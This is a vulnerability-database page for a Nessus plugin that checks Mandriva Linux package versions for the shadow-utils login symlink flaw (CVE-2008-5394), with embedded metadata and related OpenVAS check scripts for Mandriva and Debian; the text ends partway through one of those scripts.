Mandriva Linux Security Advisory : shadow-utils (MDVSA-2009:062)
2009-04-23T00:00:00
ID MANDRIVA_MDVSA-2009-062.NASL Type nessus Reporter This script is Copyright (C) 2009-2021 Tenable Network Security, Inc. Modified 2009-04-23T00:00:00
Description
A security vulnerability has been identified and fixed in the login
application from shadow-utils. It could allow local users in the
utmp group to overwrite arbitrary files via a symlink attack on a
temporary file referenced in the line (aka ut_line) field of a utmp
entry (CVE-2008-5394).
The updated packages have been patched to prevent this.
Note: Mandriva Linux uses the login application from util-linux-ng by
default and is therefore not affected by this issue in its default
configuration.
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from Mandriva Linux Security Advisory MDVSA-2009:062.
# The text itself is copyright (C) Mandriva S.A.
#
include('deprecated_nasl_level.inc');
include('compat.inc');
# Plugin registration: this branch runs only when `description` is true.
# It records the plugin's metadata and then exits (exit(0) at the end of the
# branch), so none of the host checks further down are reached from here.
if (description)
{
# Plugin identity and revision metadata.
script_id(36812);
script_version("1.13");
script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/06");
# Cross-references: the CVE and the Mandriva advisory this check is derived from.
script_cve_id("CVE-2008-5394");
script_xref(name:"MDVSA", value:"2009:062");
script_name(english:"Mandriva Linux Security Advisory : shadow-utils (MDVSA-2009:062)");
# The summary states the method: a comparison against rpm output, i.e. a
# package-version check rather than a test of the login binary itself.
script_summary(english:"Checks rpm output for the updated package");
script_set_attribute(
attribute:"synopsis",
value:"The remote Mandriva Linux host is missing a security update."
);
# Advisory text, reproduced from MDVSA-2009:062. Its final paragraph matters
# for triage: the advisory says Mandriva uses login from util-linux-ng by
# default, so a finding from this plugin indicates a missing shadow-utils
# update, not necessarily that the affected login binary is in use.
script_set_attribute(
attribute:"description",
value:
"A security vulnerability has been identified and fixed in login
application from shadow-utils, which could allow local users in the
utmp group to overwrite arbitrary files via a symlink attack on a
temporary file referenced in a line (aka ut_line) field in a utmp
entry (CVE-2008-5394).
The updated packages have been patched to prevent this.
Note: Mandriva Linux is using login application from util-linux-ng by
default, and therefore is not affected by this issue on default
configuration."
);
script_set_attribute(
attribute:"solution",
value:"Update the affected shadow-utils package."
);
# CVSS v2 vector: local access vector, low access complexity, no
# authentication, complete confidentiality/integrity/availability impact.
script_set_cvss_base_vector("CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C");
# CWE-59 (link following), consistent with the symlink attack described above.
script_cwe_id(59);
# "local" plugin type; the check works from data collected on the host
# (see the required KB keys below) rather than from a network probe.
script_set_attribute(attribute:"plugin_type", value:"local");
# CPE entries: the affected package plus the three Mandriva releases that
# the rpm checks later in this plugin cover.
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:shadow-utils");
script_set_attribute(attribute:"cpe", value:"cpe:/o:mandriva:linux:2008.0");
script_set_attribute(attribute:"cpe", value:"cpe:/o:mandriva:linux:2008.1");
script_set_attribute(attribute:"cpe", value:"cpe:/o:mandriva:linux:2009.0");
# Vendor patch date versus the date this plugin was first published.
script_set_attribute(attribute:"patch_publication_date", value:"2009/03/02");
script_set_attribute(attribute:"plugin_publication_date", value:"2009/04/23");
script_end_attributes();
script_category(ACT_GATHER_INFO);
script_copyright(english:"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.");
script_family(english:"Mandriva Local Security Checks");
# Declares ssh_get_info.nasl as a dependency; presumably that plugin fills in
# the Host/* knowledge-base keys listed next -- confirm against that plugin.
script_dependencies("ssh_get_info.nasl");
# KB keys that must be present for this plugin to run: local checks enabled,
# CPU architecture, the Mandrake release string, and the collected rpm list.
script_require_keys("Host/local_checks_enabled", "Host/cpu", "Host/Mandrake/release", "Host/Mandrake/rpm-list");
# Registration is complete; stop here.
exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("rpm.inc");
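# Host check for MDVSA-2009:062 (CVE-2008-5394, shadow-utils login symlink issue).
#
# This is a package-version check only. It compares the collected rpm list
# against the fixed shadow-utils builds and does not determine whether the
# shadow-utils login binary is the one actually in use. Per the advisory,
# Mandriva uses login from util-linux-ng by default, so treat a finding as
# "update missing" and confirm the login provider before rating exposure.

# Preconditions. audit() is expected to end the plugin with the given reason
# (the statements below rely on that) -- confirm against audit.inc.
if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
# Fixed the misspelled OS name ("Mandake") so this message matches the
# architecture message below.
if (!get_kb_item("Host/Mandrake/release")) audit(AUDIT_OS_NOT, "Mandriva / Mandrake Linux");
if (!get_kb_item("Host/Mandrake/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);

# Only x86 and x86-64 hosts are covered; any other architecture is reported
# as "local checks not implemented" rather than as unaffected.
cpu = get_kb_item("Host/cpu");
if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);
if (cpu !~ "^(amd64|i[3-6]86|x86_64)$") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Mandriva / Mandrake Linux", cpu);

# One rpm_check() per supported release, each naming the fixed build.
# rpm_check() comes from rpm.inc; presumably it is true when the installed
# package on that release is older than the reference -- confirm in rpm.inc.
# The meaning of yank:"mdv" is not visible on this page.
flag = 0;
if (rpm_check(release:"MDK2008.0", reference:"shadow-utils-4.0.12-8.1mdv2008.0", yank:"mdv")) flag++;
if (rpm_check(release:"MDK2008.1", reference:"shadow-utils-4.0.12-9.1mdv2008.1", yank:"mdv")) flag++;
if (rpm_check(release:"MDK2009.0", reference:"shadow-utils-4.0.12-17.1mdv2009.0", yank:"mdv")) flag++;

if (flag)
{
  # At least one check matched: report the finding, attaching the rpm
  # comparison details when the scan's report verbosity is above 0.
  if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());
  else security_hole(0);
  exit(0);
}
# No check matched: record the host as not affected.
else audit(AUDIT_HOST_NOT, "affected");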
{"id": "MANDRIVA_MDVSA-2009-062.NASL", "bulletinFamily": "scanner", "title": "Mandriva Linux Security Advisory : shadow-utils (MDVSA-2009:062)", "description": "A security vulnerability has been identified and fixed in login\napplication from shadow-utils, which could allow local users in the\nutmp group to overwrite arbitrary files via a symlink attack on a\ntemporary file referenced in a line (aka ut_line) field in a utmp\nentry (CVE-2008-5394).\n\nThe updated packages have been patched to prevent this.\n\nNote: Mandriva Linux is using login application from util-linux-ng by\ndefault, and therefore is not affected by this issue on default\nconfiguration.", "published": "2009-04-23T00:00:00", "modified": "2009-04-23T00:00:00", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "href": "https://www.tenable.com/plugins/nessus/36812", "reporter": "This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.", "references": [], "cvelist": ["CVE-2008-5394"], "type": "nessus", "lastseen": "2021-01-07T11:52:04", "edition": 24, "viewCount": 1, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2008-5394"]}, {"type": "ubuntu", "idList": ["USN-695-1"]}, {"type": "openvas", "idList": ["OPENVAS:136141256231063272", "OPENVAS:63555", "OPENVAS:840229", "OPENVAS:63479", "OPENVAS:136141256231063479", "OPENVAS:63272", "OPENVAS:136141256231063555"]}, {"type": "gentoo", "idList": ["GLSA-200903-24"]}, {"type": "exploitdb", "idList": ["EDB-ID:7313"]}, {"type": "debian", "idList": ["DEBIAN:DSA-1709-1:DE4E6"]}, {"type": "seebug", "idList": ["SSV:4572"]}, {"type": "nessus", "idList": ["GENTOO_GLSA-200903-24.NASL", "UBUNTU_USN-695-1.NASL", "DEBIAN_DSA-1709.NASL"]}], "modified": "2021-01-07T11:52:04", "rev": 2}, "score": {"value": 6.5, "vector": "NONE", "modified": "2021-01-07T11:52:04", "rev": 2}, "vulnersScore": 6.5}, "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package 
checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2009:062. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(36812);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2008-5394\");\n script_xref(name:\"MDVSA\", value:\"2009:062\");\n\n script_name(english:\"Mandriva Linux Security Advisory : shadow-utils (MDVSA-2009:062)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Mandriva Linux host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A security vulnerability has been identified and fixed in login\napplication from shadow-utils, which could allow local users in the\nutmp group to overwrite arbitrary files via a symlink attack on a\ntemporary file referenced in a line (aka ut_line) field in a utmp\nentry (CVE-2008-5394).\n\nThe updated packages have been patched to prevent this.\n\nNote: Mandriva Linux is using login application from util-linux-ng by\ndefault, and therefore is not affected by this issue on default\nconfiguration.\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected shadow-utils package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_cwe_id(59);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:shadow-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2008.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2008.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2009.0\");\n\n 
script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/03/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/04/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK2008.0\", reference:\"shadow-utils-4.0.12-8.1mdv2008.0\", yank:\"mdv\")) flag++;\n\nif (rpm_check(release:\"MDK2008.1\", reference:\"shadow-utils-4.0.12-9.1mdv2008.1\", yank:\"mdv\")) flag++;\n\nif (rpm_check(release:\"MDK2009.0\", reference:\"shadow-utils-4.0.12-17.1mdv2009.0\", yank:\"mdv\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "naslFamily": "Mandriva Local Security Checks", "pluginID": "36812", "cpe": ["cpe:/o:mandriva:linux:2009.0", "cpe:/o:mandriva:linux:2008.1", "cpe:/o:mandriva:linux:2008.0", "p-cpe:/a:mandriva:linux:shadow-utils"], "scheme": null}
{"cve": [{"lastseen": "2020-10-03T11:51:04", "description": "/bin/login in shadow 4.0.18.1 in Debian GNU/Linux, and probably other Linux distributions, allows local users in the utmp group to overwrite arbitrary files via a symlink attack on a temporary file referenced in a line (aka ut_line) field in a utmp entry.", "edition": 3, "cvss3": {}, "published": "2008-12-09T00:30:00", "title": "CVE-2008-5394", "type": "cve", "cwe": ["CWE-59"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-5394"], "modified": "2018-10-11T20:55:00", "cpe": ["cpe:/a:debian:shadow:4.0.18.1"], "id": "CVE-2008-5394", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-5394", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:debian:shadow:4.0.18.1:*:*:*:*:*:*:*"]}], "ubuntu": [{"lastseen": "2020-07-09T00:35:25", "bulletinFamily": "unix", "cvelist": ["CVE-2008-5394"], "description": "Paul Szabo discovered a race condition in login. While setting up \ntty permissions, login did not correctly handle symlinks. 
If a local \nattacker were able to gain control of the system utmp file, they could \ncause login to change the ownership and permissions on arbitrary files, \nleading to a root privilege escalation.", "edition": 5, "modified": "2008-12-18T00:00:00", "published": "2008-12-18T00:00:00", "id": "USN-695-1", "href": "https://ubuntu.com/security/notices/USN-695-1", "title": "shadow vulnerability", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2017-07-24T12:56:41", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5394"], "description": "The remote host is missing an update to shadow-utils\nannounced via advisory MDVSA-2009:062.", "modified": "2017-07-06T00:00:00", "published": "2009-03-07T00:00:00", "id": "OPENVAS:63479", "href": "http://plugins.openvas.org/nasl.php?oid=63479", "type": "openvas", "title": "Mandrake Security Advisory MDVSA-2009:062 (shadow-utils)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: mdksa_2009_062.nasl 6573 2017-07-06 13:10:50Z cfischer $\n# Description: Auto-generated from advisory MDVSA-2009:062 (shadow-utils)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A security vulnerability has been identified and fixed in login\napplication from shadow-utils, which could allow local users in\nthe utmp group to overwrite arbitrary files via a symlink attack on\na temporary file referenced in a line (aka ut_line) field in a utmp\nentry (CVE-2008-5394).\n\nThe updated packages have been patched to prevent this.\n\nNote: Mandriva Linux is using login application from util-linux-ng\nby default, and therefore is not affected by this issue on default\nconfiguration.\n\nAffected: 2008.0, 2008.1, 2009.0, Corporate 3.0, Corporate 4.0,\n Multi Network Firewall 2.0\";\ntag_solution = \"To upgrade automatically use MandrakeUpdate or urpmi. The verification\nof md5 checksums and GPG signatures is performed automatically for you.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=MDVSA-2009:062\";\ntag_summary = \"The remote host is missing an update to shadow-utils\nannounced via advisory MDVSA-2009:062.\";\n\n \n\nif(description)\n{\n script_id(63479);\n script_version(\"$Revision: 6573 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-06 15:10:50 +0200 (Thu, 06 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-03-07 21:47:03 +0100 (Sat, 07 Mar 2009)\");\n script_cve_id(\"CVE-2008-5394\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Mandrake Security Advisory MDVSA-2009:062 (shadow-utils)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"shadow-utils\", rpm:\"shadow-utils~4.0.12~8.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"shadow-utils\", rpm:\"shadow-utils~4.0.12~9.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"shadow-utils\", rpm:\"shadow-utils~4.0.12~17.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"shadow-utils\", rpm:\"shadow-utils~4.0.3~8.3.C30mdk\", rls:\"MNDK_3.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"shadow-utils\", rpm:\"shadow-utils~4.0.12~2.1.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"shadow-utils\", rpm:\"shadow-utils~4.0.3~8.3.C30mdk\", rls:\"MNDK_2.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:57:00", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5394"], "description": "The remote host is missing an update to shadow\nannounced via advisory DSA 1709-1.", "modified": "2017-07-07T00:00:00", "published": "2009-01-26T00:00:00", "id": "OPENVAS:63272", "href": 
"http://plugins.openvas.org/nasl.php?oid=63272", "type": "openvas", "title": "Debian Security Advisory DSA 1709-1 (shadow)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1709_1.nasl 6615 2017-07-07 12:09:52Z cfischer $\n# Description: Auto-generated from advisory DSA 1709-1 (shadow)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Paul Szabo discovered that login, the system login tool, did not\ncorrectly handle symlinks while setting up tty permissions. 
If a local\nattacker were able to gain control of the system utmp file, they could\ncause login to change the ownership and permissions on arbitrary files,\nleading to a root privilege escalation.\n\nFor the stable distribution (etch), this problem has been fixed in\nversion 4.0.18.1-7+etch1.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 4.1.1-6.\n\nWe recommend that you upgrade your shadow package.\";\ntag_summary = \"The remote host is missing an update to shadow\nannounced via advisory DSA 1709-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201709-1\";\n\n\nif(description)\n{\n script_id(63272);\n script_version(\"$Revision: 6615 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:09:52 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-01-26 18:18:20 +0100 (Mon, 26 Jan 2009)\");\n script_cve_id(\"CVE-2008-5394\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 1709-1 (shadow)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"login\", ver:\"4.0.18.1-7+etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"passwd\", ver:\"4.0.18.1-7+etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:39:59", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5394"], "description": "The remote host is missing an update to shadow\nannounced via advisory DSA 1709-1.", "modified": "2018-04-06T00:00:00", "published": "2009-01-26T00:00:00", "id": "OPENVAS:136141256231063272", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231063272", "type": "openvas", "title": "Debian Security Advisory DSA 1709-1 (shadow)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1709_1.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory DSA 1709-1 (shadow)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Paul Szabo discovered that login, the system login tool, did not\ncorrectly handle symlinks while setting up tty permissions. 
If a local\nattacker were able to gain control of the system utmp file, they could\ncause login to change the ownership and permissions on arbitrary files,\nleading to a root privilege escalation.\n\nFor the stable distribution (etch), this problem has been fixed in\nversion 4.0.18.1-7+etch1.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 4.1.1-6.\n\nWe recommend that you upgrade your shadow package.\";\ntag_summary = \"The remote host is missing an update to shadow\nannounced via advisory DSA 1709-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201709-1\";\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.63272\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-01-26 18:18:20 +0100 (Mon, 26 Jan 2009)\");\n script_cve_id(\"CVE-2008-5394\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 1709-1 (shadow)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"login\", ver:\"4.0.18.1-7+etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"passwd\", ver:\"4.0.18.1-7+etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:39:02", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5394"], "description": "The remote host is missing an update to shadow-utils\nannounced via advisory MDVSA-2009:062.", "modified": "2018-04-06T00:00:00", "published": "2009-03-07T00:00:00", "id": "OPENVAS:136141256231063479", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231063479", "type": "openvas", "title": "Mandrake Security Advisory MDVSA-2009:062 (shadow-utils)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: mdksa_2009_062.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory MDVSA-2009:062 (shadow-utils)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A security vulnerability has been identified and fixed in login\napplication from shadow-utils, which could allow local users in\nthe utmp group to overwrite arbitrary files via a symlink attack on\na temporary file referenced in a line (aka ut_line) field in a utmp\nentry (CVE-2008-5394).\n\nThe updated packages have been patched to prevent this.\n\nNote: Mandriva Linux is using login application from util-linux-ng\nby default, and therefore is not affected by this issue on default\nconfiguration.\n\nAffected: 2008.0, 2008.1, 2009.0, Corporate 3.0, Corporate 4.0,\n Multi Network Firewall 2.0\";\ntag_solution = \"To upgrade automatically use MandrakeUpdate or urpmi. 
The verification\nof md5 checksums and GPG signatures is performed automatically for you.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=MDVSA-2009:062\";\ntag_summary = \"The remote host is missing an update to shadow-utils\nannounced via advisory MDVSA-2009:062.\";\n\n \n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.63479\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-03-07 21:47:03 +0100 (Sat, 07 Mar 2009)\");\n script_cve_id(\"CVE-2008-5394\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Mandrake Security Advisory MDVSA-2009:062 (shadow-utils)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n 